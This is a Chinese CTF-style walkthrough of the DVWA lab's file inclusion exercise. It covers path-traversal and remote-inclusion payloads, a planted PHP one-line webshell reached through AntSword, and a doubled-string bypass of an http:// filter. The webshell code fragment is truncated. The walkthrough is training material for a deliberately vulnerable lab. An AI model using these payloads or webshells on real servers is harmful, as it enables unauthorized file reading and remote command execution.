返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >DVWA靶场——File Inclusion(文件包含漏洞)
  • 658
分享到

DVWA靶场——File Inclusion(文件包含漏洞)

安全web安全 2023-09-05 15:09:58 658人浏览 安东尼
摘要

1.文件包含漏洞 1.什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 File Inclusion,文件包含(漏洞),是指当服务器

1.文件包含漏洞

1.什么是文件包含?
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。

File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过PHP的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
require():可以包含文件,如果包含错了,直接报错并退出程序的执行
include():在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
require_once():与require类似,区别在于当重复调用同一文件时,程序只调用一次
include_once():与include类似,区别在于当重复调用同一文件时,程序只调用一次

类型:
本地文件包含漏洞与远程文件包含漏洞。
远程文件包含漏洞是因为开启了php配置中的allow_url_fopen选项(选项开启之后,服务器允许包含一个远程的文件)。

2.实验环境

在dvwa里第一次测试训练时,会在File Inclusion这里看到“The PHP function allow_url_include is not enabled”这个的报错提醒,这个提示告诉我们PHP函数allow_url_include还未启用.

在设置中找到对应版本,将其中allow_url_include打开。

 3.此时回去发现没有报错了。

 low

首先查看源码发现没有任何过滤。可以看出服务器包含文件时,不管文件后缀是否是php,都会尝试当做php文件执行,如果文件内容确实为php,则会正常执行并返回结果,如果不是,则会原封不动地打印文件内容,所以文件包含漏洞常常会导致任意文件读取与任意命令执行。

点开file1.php和其他的只有page=后面的发生了变化,因此可以将page后的参数视为可控字段。

文件包含是在url通过GET传参的方式获取文件,我们用 / 查看一下上下级目录,发现可以直接获取服务器文件路径。

 输入?page=../../phpinfo.php 可以看到php的具体信息。

 4. 我们在C盘创建一个txt文档。

 在url里面尝试上传包含本地文件  C://h.txt

 成功输出k.txt文件内容 只有php文件会解析运行。其他的只会原封不动的输出出来。

利用漏洞

 1.新建 txt文件上传一句话木马,进入文件上传File Upload,进行木马文件上传。

shell.php','w'),'');?>

改h.txt文件后缀为.php 。

 2将其上传,并复制下路径。

 3. 复制链接 ../../hackable/uploads/pp.php到文件包含,发现没有报错,文件解析成功。

 4.根据路径到dvwa的文件包括目录,发现生成了shell.php文件。

 5.打开蚁剑,添加链接,把地址带有木马shell.php的链接复制过来,密码就是我们木马post里面写的的密码pass,直接连接。

 medium

 

发现使用str_replace对Http://,https:// 替换成空,对于str_replace函数进行的过滤,可以使用双写进行绕过。

httphttp://://

?page=HttHttp://p://test1/h.txt

 high

 

fnmatch() 函数根据指定的模式来匹配文件名或字符串

源码中限制了文件名来防止恶意文件包含,并且!fnmatch( "file*", $file )代码使用了fnmatch函数检查page参数,要求page参数的开头必须是file,服务器才会去包含相应的文件,这样我们就远程访问不了了。

注意:file:///后面一定是绝对路径

来源地址:https://blog.csdn.net/qq_74806534/article/details/128724450

--结束END--

本文标题: DVWA靶场——File Inclusion(文件包含漏洞)

本文链接: https://lsjlt.com/news/395601.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • DVWA靶场——File Inclusion(文件包含漏洞)
    1.文件包含漏洞 1.什么是文件包含? 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。 File Inclusion,文件包含(漏洞),是指当服务器...
    99+
    2023-09-05
    安全 web安全
  • DVWA之文件包含漏洞
    文件包含漏洞原理 1、什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 2、文件包含漏洞 程序开发人员一般希望代码更灵活,所以将被包含...
    99+
    2023-09-09
    php 安全 网络
  • Pikachu靶场之文件包含漏洞详解
    Pikachu靶场之文件包含漏洞详解 前言文件包含漏洞简述1.漏洞描述2.漏洞原因3.漏洞危害4.如何防御 第一关 File Inclusion(local)1.尝试读取"隐藏"文件2.读...
    99+
    2023-10-01
    安全 web安全 php
  • 文件包含漏洞
    目录 🌻一、理论🍎1.什么是文件包含漏洞?🍎2.文件包含漏洞原因🍎3.文件包含函数🍎4.文件包含漏洞的分类&#x...
    99+
    2023-08-31
    web安全 php 文件包含漏洞
  • 【文件包含漏洞-03】文件包含漏洞的利用及如何利用本地文件包含漏洞GetShell
    文件包含漏洞的利用 读取敏感文件 我们可以利用文件包含漏洞读取任意文件,读取文件的时候有利用条件 目标主机文件存在(目标文件的路径、绝对路径、相对路径) 具有文件可读权限 提交参数http://localhost/include/...
    99+
    2023-09-05
    php 安全 Powered by 金山文档
  • 文件上传靶场-Nginx文件解析漏洞
    目录 1.靶场漏洞说明 2.漏洞利用过程 1.靶场漏洞说明 靶场地址:http://106.15.50.112:8020/ 一个简单的Nginx文件上传靶场,php配置中将cgi.fix_pathinfo设置为1,如果我们设置一个文件路径...
    99+
    2023-09-25
    php web安全 nginx 网络安全 学习
  • 文件包含漏洞——实例
    一、文件包含漏洞利用之本地包含配合文件上传包含图片马 原理: 文件上传漏洞在绕过内容检测的时候,会制作图片马上传,但是图片马在上传之后,又不能解析。如果网站同时存在文件包含漏洞,利用文件包含无视后缀名,只要被包含的文件内容符合PHP语法规范...
    99+
    2023-09-24
    安全 php 开发语言
  • 文件包含漏洞总结
    文件包含漏洞总结 CTF中文件包含漏洞0x01 什么是文件包含漏洞0X02 文件包含漏洞的环境要求0X03 常见文件包含函数0X04 PHP伪协议1、PHP:...
    99+
    2023-09-29
    php 文件包含漏洞
  • 文件包含漏洞详解
    文件包含漏洞详解 1.文件包含漏洞介绍1.1.文件包含漏洞解释1.2.文件包含漏洞原理1.3.文件包含的函数1.3.1.常见的文件包含函数1.3.2.PHP函数区别: 1.4.文件包含漏...
    99+
    2023-09-16
    web安全 网络安全 系统安全 http
  • 文件包含漏洞_练习
    CTFHup_练习 第一关_elval执行 发现源代码里面有一句话木马我们可以复制,地址到中国蚂🗡,然后把cmd填上  发现连接成功 第二个_文件包含 我们查看源代码发现里面有一个连接点开  点开之后发现有一个文件在里面就...
    99+
    2023-09-14
    开发语言 网络安全 php 前端
  • ctf include(文件包含漏洞)
    首先看到题目有个关键字include,我们就应该能够猜到这题的主要考点是文件包含 进入靶场 一进去,有个tips让我们点击,那我们点击进去瞅瞅。 果然不出所料,url上面显眼的‘file=’就是我...
    99+
    2023-10-21
    php 开发语言 网络安全
  • 浅谈文件包含之包含pearcmd.php漏洞
    文件包含之包含pearcmd.php漏洞 1.概念 pecl是PHP中用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.3及以前,pecl/pear是默认安装的; 在7.4及以后,需要我们在编译PHP的时候指定--wit...
    99+
    2023-09-02
    php web安全 安全
  • 文件上传漏洞(一) upload-labs靶场练习
    upload-labs靶场练习 1.环境搭建2.关卡解析2.1 less-1 - 基于前端JS的检测2.2 less-2 - MIME头认证2.3 less-3 php3,4,5扩展解析2.4...
    99+
    2023-09-01
    php 服务器 开发语言
  • dedecms远程文件包含漏洞
    利用前提存在重装漏洞 在自己网站准备一个远程文件 http://www.d.com/install/index.php.bakstep=11&insLockfile=a&s_lang=a&inst...
    99+
    2023-09-07
    php 安全 web安全
  • ThinkPHP文件包含漏洞分析
    出品|长白山攻防实验室(ID:A_Tree) 0x00 声明 以下内容,来自长白山攻防实验室的A_Tree作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作...
    99+
    2023-09-08
    安全 php web安全
  • PHP文件包含哪些漏洞
    这篇文章主要介绍了PHP文件包含哪些漏洞的相关知识,内容详细易懂,操作简单快捷,具有一定借鉴价值,相信大家阅读完这篇PHP文件包含哪些漏洞文章都会有所收获,下面我们一起来看看吧。漏洞描述文件包含漏洞的产生原因是在通过PHP的函数引入文件时,...
    99+
    2023-06-30
  • 文件操作之文件包含漏洞
    目录 本文仅供参考、交流、学习,如有违法行为后果自负 文件包含类型 原理方面 文件包含漏洞原理案例: 必要条件 那么如何去检测漏洞是否存在该漏洞? 白盒 黑盒 类型 本地文件包含 无限制  有限制 远程文件包含 无限制 有限制  利用 协议...
    99+
    2023-10-24
    php 开发语言
  • Vulhub漏洞靶场搭建图文教程
    目录1. 环境准备2. 配置yum源为阿里云3. 搭建docker5. 安装docker-compose6. 安装vulhub1. 环境准备 VMware虚拟机、linux镜像(Ce...
    99+
    2023-05-14
    Vulhub漏洞 Vulhub靶场 Vulhub搭建
  • 文件包含漏洞利用之本地包含配合文件上传包含图片马&&文件包含漏洞利用之远程包含Webshell
    实验原理 文件上传漏洞在绕过内容检测的时候,会制作图片马上传,但是图片马在上传之后,又不能解析。如果网站同时存在文件包含漏洞,利用文件包含无视后缀名,只要被包含的文件内容符合PHP语法规范,任何扩展名都可以被PHP解析的特点来解析上传的图片...
    99+
    2023-10-26
    php 开发语言
  • dvwa中的文件上传漏洞
    环境: Metasploitable2: 192.168.11.157 dvwa版本:Version 1.0.7 (Release date: 08/09/10) kail机器:192.168.11.156 一、什么是文件上传...
    99+
    2023-09-11
    web安全 dvwa 文件上传漏洞 Powered by 金山文档
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作